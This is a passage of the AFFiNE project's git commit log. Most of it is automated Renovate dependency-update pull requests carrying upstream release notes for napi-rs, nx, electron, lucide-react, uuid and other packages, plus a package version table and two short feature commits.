##### Bug Fixes
- **cli:** bundle lodash-es in cjs output ([#​2189](https://togithub.com/napi-rs/napi-rs/issues/2189 )) ([e860822](e8608228b8 ))
- **cli:** worker files format ([#​2186](https://togithub.com/napi-rs/napi-rs/issues/2186 )) ([13c1838](13c18388f5 ))
### [`v3.0.0-alpha.58`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.57...@napi-rs/cli@3.0.0-alpha.58 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.57...@napi-rs/cli@3.0.0-alpha.58 )
### [`v3.0.0-alpha.57`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.56...@napi-rs/cli@3.0.0-alpha.57 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.56...@napi-rs/cli@3.0.0-alpha.57 )
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.4.3`](https://togithub.com/nrwl/nx/releases/tag/19.4.3 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.4.2...19.4.3 )
##### 19.4.3 (2024-07-12)
##### 🚀 Features
- **core:** avoid forking process for nx:noop ([#​26869](https://togithub.com/nrwl/nx/pull/26869 ))
- **js:** add createNodesV2 for typescript plugin ([#​26788](https://togithub.com/nrwl/nx/pull/26788 ))
- **nx-dev:** add customers & company pages ([#​26813](https://togithub.com/nrwl/nx/pull/26813 ))
- **nx-dev:** Add more OSS logos ([#​26922](https://togithub.com/nrwl/nx/pull/26922 ))
##### 🩹 Fixes
- **core:** load isolated plugins in parallel ([#​26874](https://togithub.com/nrwl/nx/pull/26874 ))
- **core:** report should work if project graph errors ([#​26858](https://togithub.com/nrwl/nx/pull/26858 ))
- **misc:** properly set the value of the bitbucket option for ci work… ([#​26890](https://togithub.com/nrwl/nx/pull/26890 ))
- **misc:** add more ab testing for setting up ci and nx cloud ([#​26907](https://togithub.com/nrwl/nx/pull/26907 ))
- **vite:** Only attempt to amend test object if one exists ([#​26822](https://togithub.com/nrwl/nx/pull/26822 ))
- **vue:** bump vue-tsc version to 2.x.x ([#​26867](https://togithub.com/nrwl/nx/pull/26867 ))
##### ❤️ Thank You
- Craigory Coppola [@​AgentEnder](https://togithub.com/AgentEnder )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Jasper McCulloch
- Leosvel Pérez Espinosa [@​leosvelperez](https://togithub.com/leosvelperez )
- Nicholas Cunningham [@​ndcunningham](https://togithub.com/ndcunningham )
### [`v19.4.2`](https://togithub.com/nrwl/nx/releases/tag/19.4.2 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.4.1...19.4.2 )
##### 19.4.2 (2024-07-08)
##### 🚀 Features
- **core:** add support for wildcards in dependsOn ([#​19611](https://togithub.com/nrwl/nx/pull/19611 ))
- **linter:** support `eslint.config.cjs` and `*.cjs` extension with flat config ([#​26637](https://togithub.com/nrwl/nx/pull/26637 ))
##### 🩹 Fixes
- **core:** ensure better create nodes error messaging ([#​26811](https://togithub.com/nrwl/nx/pull/26811 ))
- **misc:** adjust nx cloud ab test ([#​26866](https://togithub.com/nrwl/nx/pull/26866 ))
##### ❤️ Thank You
- Ben Snyder
- Craigory Coppola [@​AgentEnder](https://togithub.com/AgentEnder )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Pavlo [@​fxposter](https://togithub.com/fxposter )
</details>
<details>
<summary>microsoft/playwright (@​playwright/test)</summary>
### [`v1.45.1`](https://togithub.com/microsoft/playwright/compare/v1.45.0...e8989f83d9801cdaadc3803b5341c601c9593947 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.0...v1.45.1 )
### [`v1.45.0`](https://togithub.com/microsoft/playwright/compare/v1.44.1...4f3f6eecae490af444dd9298c9eaeb0c596915b7 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.44.1...v1.45.0 )
</details>
<details>
<summary>electron/electron (electron)</summary>
### [`v30.2.0`](https://togithub.com/electron/electron/releases/tag/v30.2.0 ): electron v30.2.0
[Compare Source](https://togithub.com/electron/electron/compare/v30.1.2...v30.2.0 )
### Release Notes for v30.2.0
#### Features
- Enabled the Windows Control Overlay API on Linux. [#​42683](https://togithub.com/electron/electron/pull/42683 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42682 ), [32](https://togithub.com/electron/electron/pull/42681 ))</span>
- Expose `systemPreferences` to `utilityProcess`. [#​42600](https://togithub.com/electron/electron/pull/42600 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42598 ), [32](https://togithub.com/electron/electron/pull/42599 ))</span>
#### Fixes
- Fixed a focus issue when calling `BrowserWindow.setTopBrowserView`. [#​42735](https://togithub.com/electron/electron/pull/42735 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42734 ), [32](https://togithub.com/electron/electron/pull/42733 ))</span>
- Fixed an issue where `fetch`-dependent interfaces could be missing in Web Workers with `nodeIntegrationInWorker` enabled. [#​42596](https://togithub.com/electron/electron/pull/42596 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42597 ), [32](https://togithub.com/electron/electron/pull/42595 ))</span>
- Fixed an issue where `navigator.mediaDevices.enumerateDevices` could return broken results in some cases after calling `session.setPermissionCheckHandler`. [#​42807](https://togithub.com/electron/electron/pull/42807 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42809 ), [32](https://togithub.com/electron/electron/pull/42808 ))</span>
- Fixed an issue where control could fail to return properly after saving a dialog using showOpenDialogSync on Linux. [#​42676](https://togithub.com/electron/electron/pull/42676 ) <span style="font-size:small;">(Also in [29](https://togithub.com/electron/electron/pull/42679 ), [31](https://togithub.com/electron/electron/pull/42678 ), [32](https://togithub.com/electron/electron/pull/42677 ))</span>
- Fixed an issue where the user-specified default path did not work in some circumstances when using Linux dialogs. [#​42687](https://togithub.com/electron/electron/pull/42687 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42685 ), [32](https://togithub.com/electron/electron/pull/42680 ))</span>
- Fixed potentially incorrect exit code in UtilityProcess. [#​42395](https://togithub.com/electron/electron/pull/42395 ) <span style="font-size:small;">(Also in [29](https://togithub.com/electron/electron/pull/42396 ), [31](https://togithub.com/electron/electron/pull/42397 ))</span>
#### Other Changes
- Security: backported fix for CVE-2024-5493. [#​42590](https://togithub.com/electron/electron/pull/42590 )
- Security: backported fix for CVE-2024-5831.
- Security: backported fix for CVE-2024-5832. [#​42602](https://togithub.com/electron/electron/pull/42602 )
- Security: backported fix for CVE-2024-6100.
- Security: backported fix for CVE-2024-6101.
- Security: backported fix for CVE-2024-6103. [#​42617](https://togithub.com/electron/electron/pull/42617 )
- Security: backported fix for CVE-2024-6291.
- Security: backported fix for CVE-2024-6293.
- Security: backported fix for CVE-2024-6290.
- Security: backported fix for CVE-2024-6292.
- Security: backported fix for chromium:346197738. [#​42693](https://togithub.com/electron/electron/pull/42693 )
- Updated Node.js to v20.15.0. [#​42613](https://togithub.com/electron/electron/pull/42613 )
</details>
<details>
<summary>jotaijs/jotai-scope (jotai-scope)</summary>
### [`v0.7.0`](https://togithub.com/jotaijs/jotai-scope/compare/v0.6.0...v0.7.0 )
[Compare Source](https://togithub.com/jotaijs/jotai-scope/compare/v0.6.0...v0.7.0 )
</details>
<details>
<summary>lucide-icons/lucide (lucide-react)</summary>
### [`v0.408.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.408.0 ): New icons 0.408.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.407.0...0.408.0 )
#### New icons 🎨
- `monitor-cog` ([#​2310](https://togithub.com/lucide-icons/lucide/issues/2310 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `church` ([#​2273](https://togithub.com/lucide-icons/lucide/issues/2273 )) by [@​jguddas](https://togithub.com/jguddas )
- `delete` ([#​2279](https://togithub.com/lucide-icons/lucide/issues/2279 )) by [@​jguddas](https://togithub.com/jguddas )
- `drafting-compass` ([#​2266](https://togithub.com/lucide-icons/lucide/issues/2266 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.407.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.407.0 ): New icons 0.407.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.406.0...0.407.0 )
#### New icons 🎨
- `type-outline` ([#​2206](https://togithub.com/lucide-icons/lucide/issues/2206 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.406.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.406.0 ): New icons 0.406.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.405.0...0.406.0 )
#### New icons 🎨
- `calendar-arrow-down` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `calendar-arrow-up` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `clock-arrow-down` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `clock-arrow-up` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.405.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.405.0 ): New icons 0.405.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.404.0...0.405.0 )
#### New icons 🎨
- `user-pen` ([#​2303](https://togithub.com/lucide-icons/lucide/issues/2303 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `user-round-pen` ([#​2303](https://togithub.com/lucide-icons/lucide/issues/2303 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.404.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.404.0 ): New icons 0.404.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.403.0...0.404.0 )
#### New icons 🎨
- `folder-code` ([#​2276](https://togithub.com/lucide-icons/lucide/issues/2276 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.403.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.403.0 ): New icons 0.403.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.402.0...0.403.0 )
#### New icons 🎨
- `list-check` ([#​2291](https://togithub.com/lucide-icons/lucide/issues/2291 )) by [@​guanboo-yang](https://togithub.com/guanboo-yang )
### [`v0.402.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.402.0 ): New icons 0.402.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.401.0...0.402.0 )
#### New icons 🎨
- `wifi-high` ([#​2157](https://togithub.com/lucide-icons/lucide/issues/2157 )) by [@​VirtCode](https://togithub.com/VirtCode )
- `wifi-low` ([#​2157](https://togithub.com/lucide-icons/lucide/issues/2157 )) by [@​VirtCode](https://togithub.com/VirtCode )
- `wifi-zero` ([#​2157](https://togithub.com/lucide-icons/lucide/issues/2157 )) by [@​VirtCode](https://togithub.com/VirtCode )
### [`v0.401.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.401.0 ): New icons 0.401.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.400.0...0.401.0 )
#### New icons 🎨
- `scan-qr-code` ([#​2247](https://togithub.com/lucide-icons/lucide/issues/2247 )) by [@​vexkiddy](https://togithub.com/vexkiddy )
#### Modified Icons 🔨
- `book-a` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-audio` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-check` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-copy` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-dashed` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-down` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-headphones` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-heart` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-image` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-key` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-lock` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-marked` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-minus` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-plus` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-text` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-type` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-up-2` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-up` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-user` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-x` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `circle-power` ([#​2285](https://togithub.com/lucide-icons/lucide/issues/2285 )) by [@​jguddas](https://togithub.com/jguddas )
- `key-round` ([#​2278](https://togithub.com/lucide-icons/lucide/issues/2278 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon-alert` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon-pause` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon-x` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `signature` ([#​2293](https://togithub.com/lucide-icons/lucide/issues/2293 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `square-power` ([#​2285](https://togithub.com/lucide-icons/lucide/issues/2285 )) by [@​jguddas](https://togithub.com/jguddas )
</details>
<details>
<summary>nodejs/node (node)</summary>
### [`v20.15.1`](https://togithub.com/nodejs/node/compare/v20.15.0...v20.15.1 )
[Compare Source](https://togithub.com/nodejs/node/compare/v20.15.0...v20.15.1 )
</details>
<details>
<summary>i18next/react-i18next (react-i18next)</summary>
### [`v14.1.3`](https://togithub.com/i18next/react-i18next/blob/HEAD/CHANGELOG.md#1413 )
[Compare Source](https://togithub.com/i18next/react-i18next/compare/v14.1.2...v14.1.3 )
- create a isObject helper function [1766](https://togithub.com/i18next/react-i18next/pull/1766 )
- optimize nodesToString [1765](https://togithub.com/i18next/react-i18next/pull/1765 )
- Simplifies hasValidReactChildren [1764](https://togithub.com/i18next/react-i18next/pull/1764 )
- create a isString helper to avoid code duplication [1763](https://togithub.com/i18next/react-i18next/pull/1763 )
- use arrow functions where possible [1762](https://togithub.com/i18next/react-i18next/pull/1762 )
- use the commented out async code [1761](https://togithub.com/i18next/react-i18next/pull/1761 )
</details>
<details>
<summary>serde-rs/serde (serde)</summary>
### [`v1.0.204`](https://togithub.com/serde-rs/serde/releases/tag/v1.0.204 )
[Compare Source](https://togithub.com/serde-rs/serde/compare/v1.0.203...v1.0.204 )
- Apply #\[diagnostic::on_unimplemented] attribute on Rust 1.78+ to suggest adding serde derive or enabling a "serde" feature flag in dependencies ([#​2767](https://togithub.com/serde-rs/serde/issues/2767 ), thanks [@​weiznich](https://togithub.com/weiznich ))
</details>
<details>
<summary>hipstersmoothie/storybook-dark-mode (storybook-dark-mode)</summary>
### [`v4.0.2`](https://togithub.com/hipstersmoothie/storybook-dark-mode/blob/HEAD/CHANGELOG.md#v402-Wed-Jun-19-2024 )
[Compare Source](https://togithub.com/hipstersmoothie/storybook-dark-mode/compare/v4.0.1...v4.0.2 )
##### 🐛 Bug Fix
- Fix for the "Storybook preview hooks can only be called inside decorators and story functions." error [#​279](https://togithub.com/hipstersmoothie/storybook-dark-mode/pull/279 ) ([@​adam-golab](https://togithub.com/adam-golab ))
##### Authors: 1
- Adam Gołąb ([@​adam-golab](https://togithub.com/adam-golab ))
***
</details>
<details>
<summary>tailwindlabs/tailwindcss (tailwindcss)</summary>
### [`v3.4.5`](https://togithub.com/tailwindlabs/tailwindcss/compare/v3.4.4...a0dbb3d87664521af8a422df5c179d9572a4698c )
[Compare Source](https://togithub.com/tailwindlabs/tailwindcss/compare/v3.4.4...v3.4.5 )
</details>
<details>
<summary>uuid-rs/uuid (uuid)</summary>
### [`v1.10.0`](https://togithub.com/uuid-rs/uuid/releases/tag/1.10.0 )
[Compare Source](https://togithub.com/uuid-rs/uuid/compare/1.9.1...1.10.0 )
##### Deprecations
This release deprecates and renames the following functions:
- `Builder::from_rfc4122_timestamp` -> `Builder::from_gregorian_timestamp`
- `Builder::from_sorted_rfc4122_timestamp` -> `Builder::from_sorted_gregorian_timestamp`
- `Timestamp::from_rfc4122` -> `Timestamp::from_gregorian`
- `Timestamp::to_rfc4122` -> `Timestamp::to_gregorian`
##### What's Changed
- Use const identifier in uuid macro by [@​Vrajs16](https://togithub.com/Vrajs16 ) in [https://github.com/uuid-rs/uuid/pull/764 ](https://togithub.com/uuid-rs/uuid/pull/764 )
- Rename most methods referring to RFC4122 by [@​Mikopet](https://togithub.com/Mikopet ) / [@​KodrAus](https://togithub.com/KodrAus ) in [https://github.com/uuid-rs/uuid/pull/765 ](https://togithub.com/uuid-rs/uuid/pull/765 )
- prepare for 1.10.0 release by [@​KodrAus](https://togithub.com/KodrAus ) in [https://github.com/uuid-rs/uuid/pull/766 ](https://togithub.com/uuid-rs/uuid/pull/766 )
##### New Contributors
- [@​Vrajs16](https://togithub.com/Vrajs16 ) made their first contribution in [https://github.com/uuid-rs/uuid/pull/764 ](https://togithub.com/uuid-rs/uuid/pull/764 )
**Full Changelog**: https://github.com/uuid-rs/uuid/compare/1.9.1...1.10.0
</details>
<details>
<summary>IanVS/vitest-fetch-mock (vitest-fetch-mock)</summary>
### [`v0.3.0`](https://togithub.com/IanVS/vitest-fetch-mock/releases/tag/v0.3.0 )
[Compare Source](https://togithub.com/IanVS/vitest-fetch-mock/compare/v0.2.2...v0.3.0 )
#### Breaking changes
- Support Vitest 2
- Require Node 18 and above
#### Fixes
- Better TypeScript support
#### PRs:
- Update to vitest 2 by [@​birtles](https://togithub.com/birtles ) in [https://github.com/IanVS/vitest-fetch-mock/pull/18 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/18 )
- Update dependencies by [@​IanVS](https://togithub.com/IanVS ) in [https://github.com/IanVS/vitest-fetch-mock/pull/20 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/20 )
- Update node versions tested in CI by [@​IanVS](https://togithub.com/IanVS ) in [https://github.com/IanVS/vitest-fetch-mock/pull/19 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/19 )
- Fix: move index.d.ts alongside index.js main entry by [@​drwpow](https://togithub.com/drwpow ) in [https://github.com/IanVS/vitest-fetch-mock/pull/11 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/11 )
#### New Contributors
- [@​birtles](https://togithub.com/birtles ) made their first contribution in [https://github.com/IanVS/vitest-fetch-mock/pull/18 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/18 )
- [@​drwpow](https://togithub.com/drwpow ) made their first contribution in [https://github.com/IanVS/vitest-fetch-mock/pull/11 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/11 )
**Full Changelog**: https://github.com/IanVS/vitest-fetch-mock/compare/v0.2.2...v0.3.0
</details>
<details>
<summary>eratio08/vitest-mock-extended (vitest-mock-extended)</summary>
### [`v1.3.2`](https://togithub.com/eratio08/vitest-mock-extended/releases/tag/v1.3.2 )
[Compare Source](https://togithub.com/eratio08/vitest-mock-extended/compare/v1.3.1...v1.3.2 )
##### Bug Fixes
- Resolve issues with Vitest 2.0 Mock Type changes ([b1d2b89](b1d2b893dd ))
- `vitest-mock-extended` now requires `vitest` `2.0.0`
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzEuNCIsInVwZGF0ZWRJblZlciI6IjM3LjQzMS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-16 07:29:08 +00:00
donteatfriedrice
53eb4aca8d
feat: add notification when chat panel action success ( #7490 )
...
[BS-318](https://linear.app/affine-design/issue/BS-318/右侧边栏-ai-title-位置不统一 )
[BS-418](https://linear.app/affine-design/issue/BS-418/chat-panel-response-成功后,添加-toast )
2024-07-16 06:15:40 +00:00
forehalo
b15294d80c
chore(server): add mail metrics ( #7514 )
2024-07-16 03:22:47 +00:00
renovate
3590b53f40
chore: bump up all non-major dependencies ( #7506 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.609.0` -> `3.614.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.609.0/3.614.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@fal-ai/serverless-client](https://togithub.com/fal-ai/fal-js ) ([source](https://togithub.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`^0.12.0` -> `^0.13.0`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.12.0/0.13.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@google-cloud/opentelemetry-cloud-monitoring-exporter](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`^0.18.0` -> `^0.19.0`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-cloud-monitoring-exporter/0.18.0/0.19.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.56` -> `3.0.0-alpha.58`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.56/3.0.0-alpha.58 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.4.1` -> `19.4.3`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.4.1/19.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/test-runner](https://togithub.com/storybookjs/test-runner ) | [`0.19.0` -> `0.19.1`](https://renovatebot.com/diffs/npm/@storybook%2ftest-runner/0.19.0/0.19.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [electron](https://togithub.com/electron/electron ) | [`~30.1.0` -> `~30.2.0`](https://renovatebot.com/diffs/npm/electron/30.1.2/30.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [jotai-scope](https://togithub.com/jotaijs/jotai-scope ) | [`^0.6.0` -> `^0.7.0`](https://renovatebot.com/diffs/npm/jotai-scope/0.6.0/0.7.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.400.0` -> `^0.408.0`](https://renovatebot.com/diffs/npm/lucide-react/0.400.0/0.408.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.5` -> `3.0.0-alpha.7` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.4` -> `3.0.0-alpha.5` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.15.0` -> `20.15.1` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | patch |
| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.1`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [serde](https://serde.rs ) ([source](https://togithub.com/serde-rs/serde )) | `1.0.203` -> `1.0.204` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [storybook-dark-mode](https://togithub.com/hipstersmoothie/storybook-dark-mode ) | [`4.0.1` -> `4.0.2`](https://renovatebot.com/diffs/npm/storybook-dark-mode/4.0.1/4.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
